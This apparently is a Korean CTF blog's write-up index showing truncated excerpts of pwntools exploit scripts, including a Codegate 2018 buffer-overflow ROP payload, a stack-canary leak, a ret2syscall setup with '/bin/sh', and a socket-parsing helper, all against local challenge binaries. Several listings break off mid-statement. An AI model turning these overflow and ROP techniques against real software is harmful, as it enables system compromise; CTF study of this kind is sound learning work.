목록Write Up (7)
9oat's LAB
from pwn import *

# Teaser excerpt of a CTF write-up script (Codegate 2018, BaskinRobins31);
# the listing on this page is cut off before the script ends.

# Path to the challenge binary on the author's machine.
b = '/home/goat/PROB/2018 Codegate/BaskinRobins31'
elf = ELF(b)       # parse the binary so its PLT/GOT entries can be looked up by name
c = process(b)     # run the binary locally and talk to it over a pwntools tube

# Hard-coded address of an instruction sequence inside the binary.
# NOTE(review): a fixed address is only valid when the binary loads at a fixed
# base (no PIE) - confirm with checksec before relying on it.
pppr = p64(0x40087a) # pop rdi, pop rsi, pop rdx

# Symbol addresses read from the ELF's PLT and GOT tables.
write_plt = elf.plt['write']
write_got = elf.got['write']
read_plt = elf.plt['read']
strtoul_got = elf.got['strtoul']

# Payload: 0xb8 filler bytes followed by the address above.
# NOTE(review): 0xb8 is presumably the distance from the input buffer to the
# saved return address; the excerpt does not show how it was derived. An
# overwrite like this presupposes an unchecked read into a stack buffer and no
# stack canary - both are what a fix or hardened build would change.
pay = ''
pay += 'A'*0xb8
pay += pppr

# leak write's libc add..
# (the page truncates the listing here; the remainder of the script is not shown)
from pwn import *


def smtm(s):
    """Send the 'show me the marimo' command and two 'tmp' answers on tube *s*.

    After each line is sent, the function blocks until the service prints its
    ">>" prompt again, so the tube is left at a prompt when it returns.
    What the two 'tmp' answers are used for is not visible in this excerpt.
    """
    for line in ('show me the marimo\n', 'tmp\n', 'tmp\n'):
        s.send(line)
        s.recvuntil(">>")


# The page truncates the listing inside the next helper. The visible fragment
# is kept verbatim below; it is incomplete and not runnable as shown:
#   def mod(s,pay,sel): s.send('V\n') s.recvuntil(">>") s.send(sel)
#   s.recvuntil(">>") s.send('M\n') s.recvuntil(">>") s.sen..
from pwn import *

# Teaser excerpt of a CTF write-up script; the page truncates the listing
# partway through. Python 2 syntax (print statement below).

# Connect to a service listening on localhost port 8888.
s = remote("127.0.0.1", 8888)

# Hard-coded 32-bit addresses and data used later in the script.
# NOTE(review): fixed addresses only hold for a binary loaded at a fixed base
# (the 0x80xxxxx values look like a non-PIE 32-bit image) - confirm against
# the actual target before trusting them.
pppr = p32(0x806f280) # edx ecx ebx
eax = p32(0x8048882)
int80 = p32(0x806f870)
bss = p32(0x80ea3d0)
binsh = "/bin/sh"
print "[*] Start"

# Walk the service's prompts: answer "2", then "y", waiting for the expected
# prompt text before each reply.
s.recvuntil(": ")
s.send("2\n")
s.recvuntil(") ")
s.send("y\n")
s.recvuntil(".\n")
# Send 65 bytes (64 'a' plus one 'x') and read 68 bytes back.
# NOTE(review): presumably the service echoes the input together with the
# bytes that follow it on the stack; the next (truncated) statement starts
# with "canar", which suggests the stack canary is taken from this reply.
# A reply that returns more bytes than were written is the disclosure a fix
# would have to close (terminate or bound the echoed buffer) - confirm
# against the full write-up.
s.send(("a"*64)+"x")
s.recvn(68)

# canar..
# (the page truncates the listing here, mid-statement; the rest is not shown)
1234567891011121314151617181920212223242526from pwn import *from struct import * p = lambda x: pack("
from socket import *


def parser(q):
    """Pull the integers that follow ``N=`` and ``C=`` out of the text *q*.

    The N field is the text after the first ``N=`` up to the next `` C``; the
    C field is the text after the first ``C=`` up to the next newline.

    Returns:
        A ``(num, cnt)`` tuple of ints.

    Raises:
        IndexError: a marker is missing from *q*.
        ValueError: a field is not a valid integer.

    NOTE(review): *q* presumably arrives from a socket peer (the module
    imports ``socket``), so callers should expect these exceptions on
    malformed input - confirm against the call site.
    """
    n_field = q.split('N=')[1].split(' C')[0]
    num = int(n_field)
    c_field = q.split('C=')[1].split('\n')[0]
    cnt = int(c_field)
    return (num, cnt)


def value(src, dst):
    """Return the integers from *src* up to, but excluding, *dst* joined by spaces."""
    return ' '.join(map(str, range(src, dst)))


# The page truncates the listing inside the next helper. The visible fragment
# is kept verbatim below; it is incomplete and not runnable as shown:
#   def mid(src, dst): if (dst - src) % 2 == 0: mid = src + (dst-src) / 2 elif ..
1234567891011121314151617181920212223242526272829303132333435363738#include #include void main(){ int i; char *argvs[100]={""}; for(i=0;i